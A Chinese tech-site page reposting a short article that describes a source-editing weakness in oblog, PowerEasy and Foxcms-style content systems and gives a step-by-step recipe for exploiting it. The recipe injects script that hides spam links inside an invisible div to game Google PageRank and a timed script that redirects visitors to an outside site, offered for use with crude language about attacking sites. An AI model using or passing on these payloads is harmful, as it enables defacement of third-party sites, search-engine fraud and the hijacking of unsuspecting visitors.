代码驿站移动版
频道导航
HTML/Xhtml
CSS
JavaScript
HTML5
PHP教程
ASP.NET
正则表达式
AJAX
ThinkPHP
Yii
MySQL
MariaDB
Oracle
MongoDB
Redis
DedeCMS
PHPCMS
帝国CMS
WordPress
Discuz
其它CMS
Zend Studio
Sublime
Notepad
Dreamweaver
Windows
Linux
Nginx
Apache
IIS
CentOS
Ubuntu
Debian
网站优化
工具资源
PHP源码
ASP.NET源码
其它源码
图标素材
按钮素材
字体素材
DedeCMS模板
帝国CMS模板
PHPCMS模板
WordPress模板
Discuz!模板
单页模板
开发软件下载
服务器软件下载
广告投放
联系我们
版权申明
软件编程
网页前端
移动开发
数据库
服务器
脚本语言
PHP代码
JAVA代码
Python代码
Android代码
当前位置:
主页
> >
关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
时间:2022-11-12 10:12:37 | 栏目: | 点击:次
目前的oblog、动易、风讯等一系列著名的系统,都存在源码编辑漏洞。
具体操作是:
1,进入"源码"编辑
2,输入阶段公分四段:
第一段:<此处输入正文,做事需要手下留情嘛,来点实际内容>
第二段:<script>document.write('<div style="display:none">');</script>
第三段:<此处输入作弊链接,获取google的pr值,此处的内容将不会被浏览者看 到,且不会被搜索引擎发现>
第四段:<SCRIPT>window.setTimeout("Timer()", 1000);function Timer(){document.location='http://31u.net';}</SCRIPT>
第一段你可以略过,如果你想剧烈的强奸的话。第二段代码是为了隐藏第三段的链接。第四段为定时和跳转。将时间设定超过10秒为好,呵呵有利于搜索引擎收录嘛。
也可以不设置时间或将时间设置为0,那么点击该页面后将直接跳转到指定页面。
3,提交。
此方法目前没有解决ubb转换的问题。但是作者目前发现好多的文章系统什么的都没有进行ubb转换,动网论坛目前暂时无法强奸,正在进一步研究中
您可能感兴趣的文章:
易语言解析淘宝客短链接转换成商品真实链接的代码
关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
eWebEditorNet漏洞利用思路
Docker挂载资料卷部署Nginx
SQLite 错误码整理
相关文章
11-10
使用 Loki 实现 Kubernetes 容器日志监控的方法
11-10
杰奇登录后的东西都是在session里面的
11-10
希捷官方免费磁盘备份工具 替代Ghost ? 大家下载测试
11-10
R包制作后出现not available for错误问题解决解决
11-10
Docker Compose常用命令详解
JQuery
VUE
AngularJS
MSSql
MySQL
MongoDB
Redis
Linux
Tomcat
Nginx
网站首页
广告投放
联系我们
版权申明
联系站长